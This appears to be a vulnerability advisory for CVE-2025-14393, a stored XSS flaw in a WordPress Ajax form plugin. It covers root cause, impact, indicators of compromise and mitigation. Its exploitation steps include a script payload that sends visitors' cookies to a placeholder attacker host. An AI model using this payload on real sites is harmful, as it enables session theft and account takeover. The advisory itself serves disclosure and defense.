CVE-2025-14393
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-14393 is a Stored Cross-Site Scripting (XSS) vulnerability in the Wpik WordPress Basic Ajax Form plugin for WordPress. It affects all versions up to and including 1.0, caused by insufficient input sanitization and output escaping of the dname parameter. Authenticated attackers with Contributor-level access or above can inject arbitrary web scripts into pages that execute for any user who visits the affected page. The vulnerability was published on December 12, 2025, and carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, Red Hat CVE).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a Stored XSS variant. The vulnerable code resides in the plugin's index.php file (lines 84, 85, and 107), where the dname parameter is accepted from user input and rendered in page output without proper sanitization or escaping (Wordfence, Plugin Source). An attacker with at least Contributor-level WordPress access submits a malicious payload via the dname parameter, which is then persistently stored and later rendered in the browser of any visitor to the injected page. No user interaction beyond page visitation is required for the payload to execute, and the scope is changed — meaning the injected script can affect users beyond the attacker's own session.

Impact

Successful exploitation allows injected scripts to execute in the browsers of all users who visit the compromised page, enabling session cookie theft, credential harvesting, unauthorized actions performed on behalf of victims, and potential account takeover — including administrator accounts if an admin visits the page. The persistent (stored) nature of the attack means the payload remains active until removed, maximizing the number of affected users. Confidentiality and integrity are both impacted (low severity each per CVSS), while availability is not directly affected (Wordfence, Red Hat CVE).

Exploitability

No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-14393 as of the available data. The EPSS score is approximately 0.036%, indicating a low probability of exploitation in the near term (Feedly). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires at minimum a Contributor-level WordPress account, which limits the attack surface compared to unauthenticated vulnerabilities, though it remains a realistic threat on sites with open contributor registration.

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Wpik WordPress Basic Ajax Form plugin version 1.0 or earlier, using tools like WPScan or manual inspection of plugin directories.
  2. Obtain Contributor access: Register or compromise a Contributor-level (or higher) account on the target WordPress site.
  3. Craft malicious payload: Prepare a JavaScript payload to be injected via the dname parameter, e.g., <script>document.location='https://attacker.example.com/steal?c='+document.cookie</script>.
  4. Submit the payload: Use the plugin's Ajax form submission functionality to submit the crafted dname parameter value containing the malicious script, causing it to be stored in the database.
  5. Trigger execution: When any user (including administrators) visits the page containing the injected form output, the stored script executes in their browser, potentially exfiltrating session cookies or performing actions on their behalf (Wordfence, Plugin Source).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to plugin-related AJAX endpoints (e.g., wp-admin/admin-ajax.php) with unusual or encoded values in the dname parameter; entries containing HTML tags or JavaScript keywords (<script>, onerror, javascript:) in form submission logs.
  • Database: Unexpected JavaScript or HTML script tags stored in the WordPress database within fields associated with the Wpik Basic Ajax Form plugin's data.
  • Network: Outbound requests from visitor browsers to unknown external domains shortly after loading pages containing the plugin's form output, potentially indicating cookie or credential exfiltration.
  • File System: No direct file system artifacts expected for this stored XSS, but review plugin files (index.php) for unauthorized modifications that may have introduced additional backdoors.

Mitigation and workarounds

As of the disclosure date (December 12, 2025), no patched version of the Wpik WordPress Basic Ajax Form plugin has been released — all versions up to and including 1.0 are affected (Wordfence). The recommended immediate action is to deactivate and remove the plugin until a patched version is available. Site administrators should also restrict Contributor-level registrations if not required, and deploy a Web Application Firewall (WAF) capable of detecting XSS payloads as a compensating control. Monitor the WordPress plugin repository and Wordfence advisories for patch availability.

Community reactions

Wordfence identified and disclosed the vulnerability as part of their weekly WordPress vulnerability report for December 8–14, 2025, assigning it a CVSS score of 6.4 (Medium) (Wordfence Weekly Report). Red Hat also tracked the CVE in their security advisory database (Red Hat CVE). No significant broader media coverage or notable researcher commentary beyond standard vulnerability aggregation was observed.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-77115HIGH7.1
  • brave-popup-builder
NoYesAug 23, 2026
CVE-2026-77116MEDIUM4.3
  • brave-popup-builder
NoYesAug 23, 2026
CVE-2026-14853MEDIUM4.3
  • woocommerce-bookings
NoYesAug 23, 2026
CVE-2026-77003LOW2.7
  • content-mask
NoYesAug 23, 2026
CVE-2026-13598NONEN/A
  • restrictmate
NoYesAug 23, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management